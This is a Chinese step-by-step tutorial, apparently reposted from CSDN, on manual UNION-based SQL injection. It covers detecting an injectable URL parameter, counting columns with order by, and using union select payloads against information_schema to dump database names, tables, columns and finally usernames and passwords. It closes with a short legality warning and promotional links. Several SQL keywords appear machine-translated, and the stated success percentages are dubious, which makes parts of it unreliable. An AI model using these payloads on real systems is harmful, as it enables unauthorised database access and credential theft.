1、拿到网页后进行查找注入点;
1. 使用单引号\’.在URL后面输入单引号并回车(如果报错可能是SQL注入:大约10%)
2.使用逻辑运算(在URL后输入,1=1是好的,1=2是坏的;SQL注入漏洞的概率约为40-60%)
3.使用休眠功能,俗称钓鱼功能(在URL后输入sleep(10),会导致网页休眠10秒。休眠与网速有关,因此SQL注入漏洞出现这种情况的概率约为50%)。
4.使用计算进行测试(例如:id=1可以改为id=2-1或3-2,可以通过计算来完成,SQL注入漏洞的概率约为95-100%)
2、进行测试报字段通过(order by函数);我的字段是9
在URL后添加按XXX(整数)排序,并多次使用XXX来查找重要值(报错和不报错的界限)。
3、通过寻找到的字段后进行联合查询;
URL+联合选择
1,2,3,4,5,6,7,8,9(显示字段序号对应的位置,一般第一个数字为序号,后面的数字为字段序号) 1 不应该可以更改,因为它只占据位置(可以重新定位)
4、查询数据库名;
URL+联合选择
1,2,database(),4,5,6,7,8,9(database(),占用的位置当然可以改,只要不占用1就没有问题)
5、查询数据库版本号;
URL + 联合选择1,2,3,4,version(),6,7,8,9
(version(),占用的位置当然可以改变,但是只要不占用1就没有问题)
查询数据库版本的目的是当mysql版本大于5.0时,必然会出现默认的库信息如:
我通常使用的默认库是:information_schema
6、查询数据库中的表名;
URL + 联合选择1,2,3,4,group_concat(表名),6,7,8,9,from
information_schema.tables 其中table_schema=database()可以找到所有表的表名。
7、直接爆出表中用户;
URL + 联合选择1,2,3,4,group_concat(column_name),6,7,8,9,from
information_schema.columns 其中table_name=‘表名’
注意: 开发人员非常聪明,可能会使用特殊字符来过滤他们的代码,因此您应该在输入查询之前将“表名称”转换为十六进制或其他值。
8、查看表中所有信息内容;
URL + Union select 1,2,3,4,group_concat(usename,0x7e,password),6,7,8,9,来自表名
获取每个用户的具体信息
PS:这里不再详细介绍如何破解后端URL并登录(注意,你可能必须尝试解密密码)。
提倡网络安全,不要徘徊法律界限,不要随意攻击他人网站。
网络安全成长路线图
早期朝这个方向起步相对容易。一旦掌握了一些基本技术,您就可以获取各种现成的工具并开始黑客攻击。然而,如果你想从一个脚本小子变成一个黑客高手,越往这个方向走,你就越需要学习和掌握。这是学习网络安全所需的方向。
上面介绍了技术分类和学习路线有几种学习方法。
无论您访问Bilibili 还是YouTube,都有大量与网络安全相关的视频可供您学习。当然,如果您不确定选择哪个,我们还整理了一系列链接视频教程。如果您有兴趣开始网络安全,请单击此处以获得网络安全的巨大好处。免费提供完整的入门级和高级共享的282G学习资源包。
如果你对网络安全入门感兴趣,那么你点击这里CSDN大礼包:《黑客网络安全入门进阶学习资源包》免费分享
# 以上关于SQL注入验证安全和渗透测试攻击性能的内容摘自网络,供大家参考。相关信息请参见官方公告。
原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/91957.html